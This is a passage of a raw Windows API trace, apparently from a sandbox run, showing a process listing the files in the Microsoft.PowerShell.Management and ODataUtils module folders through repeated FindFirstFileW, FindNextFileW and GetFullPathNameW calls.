(in: hFindFile=0x1a592a30 | out: hFindFile=0x1a592a30) returned 1 [0177.105] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0177.105] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0177.105] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0177.105] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management", lpFilePart=0x0) returned 0x52 [0177.105] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\", lpFilePart=0x0) returned 0x53 [0177.105] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592a30 [0177.106] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.106] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3ae304, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3ae304, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3ae304, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x955, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management.psd1", cAlternateFileName="")) returned 1 [0177.106] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0177.106] FindClose (in: hFindFile=0x1a592a30 | out: hFindFile=0x1a592a30) returned 1 [0177.106] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0177.106] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0177.107] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management", nBufferLength=0x105, lpBuffer=0x1b7de100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management", lpFilePart=0x0) returned 0x52 [0177.107] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de540) returned 1 [0177.107] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management"), fInfoLevelId=0x0, lpFileInformation=0x1b7de620 | out: lpFileInformation=0x1b7de620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0177.107] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de500) returned 1 [0177.107] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de570) returned 1 [0177.107] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management", nBufferLength=0x105, lpBuffer=0x1b7de060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management", lpFilePart=0x0) returned 0x52 [0177.107] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\", lpFilePart=0x0) returned 0x53 [0177.107] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\*", lpFindFileData=0x1b7de210 | out: lpFindFileData=0x1b7de210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592790 [0177.108] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.108] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3ae304, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3ae304, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3ae304, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x955, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management.psd1", cAlternateFileName="")) returned 1 [0177.108] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3ae304, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3ae304, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3ae304, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x955, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management.psd1", cAlternateFileName="")) returned 0 [0177.108] FindClose (in: hFindFile=0x1a592790 | out: hFindFile=0x1a592790) returned 1 [0177.108] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de4c0) returned 1 [0177.108] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de480) returned 1 [0177.108] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.management.psd1")) returned 0x20 [0177.109] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0177.109] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", lpFilePart=0x0) returned 0x52 [0177.109] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\", lpFilePart=0x0) returned 0x53 [0177.109] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592010 [0177.111] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.111] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0177.111] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f9f05ad, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f9f05ad, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f9f05ad, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x29c8e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataAdapter.ps1", cAlternateFileName="")) returned 1 [0177.112] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6194, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtils.psd1", cAlternateFileName="")) returned 1 [0177.112] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x47a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtils.psm1", cAlternateFileName="")) returned 1 [0177.112] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f9f05ad, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f9f05ad, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f9f05ad, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xcb3c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtilsHelper.ps1", cAlternateFileName="")) returned 1 [0177.112] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1fa9f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataV4Adapter.ps1", cAlternateFileName="")) returned 1 [0177.112] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1fa9f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataV4Adapter.ps1", cAlternateFileName="")) returned 0 [0177.112] FindClose (in: hFindFile=0x1a592010 | out: hFindFile=0x1a592010) returned 1 [0177.113] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0177.113] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0177.113] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0177.113] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", lpFilePart=0x0) returned 0x52 [0177.113] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\", lpFilePart=0x0) returned 0x53 [0177.114] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592790 [0177.115] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.115] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0177.115] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f9f05ad, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f9f05ad, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f9f05ad, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x29c8e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataAdapter.ps1", cAlternateFileName="")) returned 1 [0177.115] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6194, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtils.psd1", cAlternateFileName="")) returned 1 [0177.115] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x47a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtils.psm1", cAlternateFileName="")) returned 1 [0177.115] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f9f05ad, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f9f05ad, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f9f05ad, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xcb3c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtilsHelper.ps1", cAlternateFileName="")) returned 1 [0177.116] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1fa9f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataV4Adapter.ps1", cAlternateFileName="")) returned 1 [0177.116] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0177.116] FindClose (in: hFindFile=0x1a592790 | out: hFindFile=0x1a592790) returned 1 [0177.117] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0177.117] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0177.117] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de380) returned 1 [0177.117] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US", nBufferLength=0x105, lpBuffer=0x1b7dde70, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US", lpFilePart=0x0) returned 0x58 [0177.117] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US\\", nBufferLength=0x105, lpBuffer=0x1b7dde10, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US\\", lpFilePart=0x0) returned 0x59 [0177.117] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US\\*", lpFindFileData=0x1b7de020 | out: lpFindFileData=0x1b7de020*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592010 [0177.119] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.119] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9abb71ce, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9abb71ce, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9abb71ce, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x2e5a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtilsStrings.psd1", cAlternateFileName="")) returned 1 [0177.119] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9abb71ce, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9abb71ce, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9abb71ce, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x2e5a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtilsStrings.psd1", cAlternateFileName="")) returned 0 [0177.119] FindClose (in: hFindFile=0x1a592010 | out: hFindFile=0x1a592010) returned 1 [0177.119] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de2d0) returned 1 [0177.119] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de290) returned 1 [0177.119] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de380) returned 1 [0177.119] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US", nBufferLength=0x105, lpBuffer=0x1b7dde70, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US", lpFilePart=0x0) returned 0x58 [0177.119] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US\\", nBufferLength=0x105, lpBuffer=0x1b7dde10, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US\\", lpFilePart=0x0) returned 0x59 [0177.120] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US\\*", lpFindFileData=0x1b7de020 | out: lpFindFileData=0x1b7de020*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592010 [0177.120] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.120] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x20, 